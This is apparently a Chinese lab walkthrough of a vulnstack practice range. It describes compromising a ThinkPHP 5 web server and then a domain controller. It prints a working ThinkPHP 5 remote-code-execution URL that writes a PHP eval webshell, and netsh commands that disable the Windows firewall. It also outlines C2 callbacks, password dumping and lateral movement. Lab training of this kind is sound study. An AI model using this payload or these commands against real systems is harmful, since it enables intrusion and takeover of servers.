靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网)
win2008:192.168.138.138

访问80看看,是TP5的站

关于tp5的漏洞利用方式请查看:https://www.cnblogs.com/backlion/p/10106676.html
成功利用,并执行了命令

写入shell
http://192.168.1.18/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["code"]);?^>>shell.php

上线C2



内网存活主机探测

查看域控


现在已经是管理员权限了可以直接抓下密码看看

上链路进行横向


生成载荷上传到目标机器

批量上线DC不成功

NetSh Advfirewall set allprofiles state off ,或者添加规则来放行5555端口netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=5555
最后全部上线

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。